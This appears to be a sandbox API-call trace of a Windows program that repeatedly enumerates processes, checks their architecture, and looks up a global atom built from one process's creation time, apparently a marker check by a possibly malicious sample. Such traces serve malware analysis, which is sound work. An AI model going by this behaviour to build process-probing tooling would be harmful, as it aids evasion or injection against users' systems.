	[0114.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0114.443] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.443] CloseHandle (hObject=0x698) returned 1
	[0114.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0114.444] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.444] CloseHandle (hObject=0x698) returned 1
	[0114.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0114.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0114.444] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.444] CloseHandle (hObject=0x698) returned 1
	[0114.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0114.444] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.444] CloseHandle (hObject=0x698) returned 1
	[0114.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0114.446] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.446] CloseHandle (hObject=0x698) returned 1
	[0114.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0114.446] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.447] CloseHandle (hObject=0x698) returned 1
	[0114.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0114.447] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.447] CloseHandle (hObject=0x698) returned 1
	[0114.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0114.447] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.447] CloseHandle (hObject=0x698) returned 1
	[0114.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0114.447] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.447] CloseHandle (hObject=0x698) returned 1
	[0114.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0114.447] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.447] CloseHandle (hObject=0x698) returned 1
	[0114.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0114.448] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.448] CloseHandle (hObject=0x698) returned 1
	[0114.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0114.448] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.448] CloseHandle (hObject=0x698) returned 1
	[0114.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0114.448] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.448] CloseHandle (hObject=0x698) returned 1
	[0114.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0114.448] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.448] CloseHandle (hObject=0x698) returned 1
	[0114.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0114.448] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.448] CloseHandle (hObject=0x698) returned 1
	[0114.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0114.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.449] CloseHandle (hObject=0x698) returned 1
	[0114.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0114.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.449] CloseHandle (hObject=0x698) returned 1
	[0114.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0114.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.449] CloseHandle (hObject=0x698) returned 1
	[0114.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0114.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.449] CloseHandle (hObject=0x698) returned 1
	[0114.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0114.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.450] CloseHandle (hObject=0x698) returned 1
	[0114.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0114.450] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.450] CloseHandle (hObject=0x698) returned 1
	[0114.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0114.450] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.450] CloseHandle (hObject=0x698) returned 1
	[0114.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0114.450] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.450] CloseHandle (hObject=0x698) returned 1
	[0114.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0114.450] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.450] CloseHandle (hObject=0x698) returned 1
	[0114.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.451] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.451] CloseHandle (hObject=0x698) returned 1
	[0114.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.451] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.451] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0114.451] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0114.451] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0114.452] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.452] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0114.452] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.452] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0114.452] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0114.452] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0114.453] CloseHandle (hObject=0x698) returned 1
	[0114.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0114.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0114.453] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.453] CloseHandle (hObject=0x698) returned 1
	[0114.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0114.453] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.453] CloseHandle (hObject=0x698) returned 1
	[0114.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0114.453] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.453] CloseHandle (hObject=0x698) returned 1
	[0114.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0114.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0114.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0114.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0114.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0114.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0114.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0114.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0114.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0114.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0114.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0114.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0114.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0114.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0114.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0114.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0114.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0114.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0114.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0114.515] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.515] CloseHandle (hObject=0x698) returned 1
	[0114.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0114.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0114.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0114.515] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.515] CloseHandle (hObject=0x698) returned 1
	[0114.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0114.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0114.515] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.515] CloseHandle (hObject=0x698) returned 1
	[0114.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0114.516] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.516] CloseHandle (hObject=0x698) returned 1
	[0114.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0114.516] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.516] CloseHandle (hObject=0x698) returned 1
	[0114.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0114.516] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.516] CloseHandle (hObject=0x698) returned 1
	[0114.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0114.516] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.516] CloseHandle (hObject=0x698) returned 1
	[0114.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0114.516] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.517] CloseHandle (hObject=0x698) returned 1
	[0114.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0114.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0114.517] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.517] CloseHandle (hObject=0x698) returned 1
	[0114.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0114.517] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.517] CloseHandle (hObject=0x698) returned 1
	[0114.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0114.517] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.517] CloseHandle (hObject=0x698) returned 1
	[0114.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0114.517] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.518] CloseHandle (hObject=0x698) returned 1
	[0114.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0114.518] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.518] CloseHandle (hObject=0x698) returned 1
	[0114.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0114.518] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.518] CloseHandle (hObject=0x698) returned 1
	[0114.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0114.518] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.518] CloseHandle (hObject=0x698) returned 1
	[0114.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0114.518] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.518] CloseHandle (hObject=0x698) returned 1
	[0114.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0114.519] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.519] CloseHandle (hObject=0x698) returned 1
	[0114.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0114.520] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.520] CloseHandle (hObject=0x698) returned 1
	[0114.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0114.520] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.520] CloseHandle (hObject=0x698) returned 1
	[0114.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0114.520] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.520] CloseHandle (hObject=0x698) returned 1
	[0114.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0114.521] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.521] CloseHandle (hObject=0x698) returned 1
	[0114.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0114.521] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.521] CloseHandle (hObject=0x698) returned 1
	[0114.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0114.521] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.521] CloseHandle (hObject=0x698) returned 1
	[0114.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0114.521] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.521] CloseHandle (hObject=0x698) returned 1
	[0114.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0114.521] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.521] CloseHandle (hObject=0x698) returned 1
	[0114.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0114.522] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.522] CloseHandle (hObject=0x698) returned 1
	[0114.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0114.522] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.522] CloseHandle (hObject=0x698) returned 1
	[0114.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0114.522] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.522] CloseHandle (hObject=0x698) returned 1
	[0114.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0114.522] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.522] CloseHandle (hObject=0x698) returned 1
	[0114.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0114.522] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.522] CloseHandle (hObject=0x698) returned 1
	[0114.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.523] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.523] CloseHandle (hObject=0x698) returned 1
	[0114.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.523] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.523] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0114.523] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0114.524] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0114.524] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.524] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0114.524] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.524] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0114.525] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0114.525] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0114.525] CloseHandle (hObject=0x698) returned 1
	[0114.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0114.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0114.525] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.525] CloseHandle (hObject=0x698) returned 1
	[0114.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0114.525] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.525] CloseHandle (hObject=0x698) returned 1
	[0114.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0114.526] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.526] CloseHandle (hObject=0x698) returned 1
	[0114.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0114.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0114.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0114.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0114.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0114.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0114.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0114.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0114.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0114.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0114.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0114.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0114.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0114.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0114.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0114.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0114.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0114.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0114.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0114.578] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.578] CloseHandle (hObject=0x698) returned 1
	[0114.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0114.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0114.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0114.579] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.579] CloseHandle (hObject=0x698) returned 1
	[0114.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0114.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0114.579] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.579] CloseHandle (hObject=0x698) returned 1
	[0114.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0114.579] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.579] CloseHandle (hObject=0x698) returned 1
	[0114.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0114.579] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.579] CloseHandle (hObject=0x698) returned 1
	[0114.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0114.580] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.580] CloseHandle (hObject=0x698) returned 1
	[0114.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0114.580] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.580] CloseHandle (hObject=0x698) returned 1
	[0114.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0114.580] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.580] CloseHandle (hObject=0x698) returned 1
	[0114.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0114.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0114.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.581] CloseHandle (hObject=0x698) returned 1
	[0114.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0114.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.581] CloseHandle (hObject=0x698) returned 1
	[0114.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0114.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.581] CloseHandle (hObject=0x698) returned 1
	[0114.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0114.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.581] CloseHandle (hObject=0x698) returned 1
	[0114.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0114.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.581] CloseHandle (hObject=0x698) returned 1
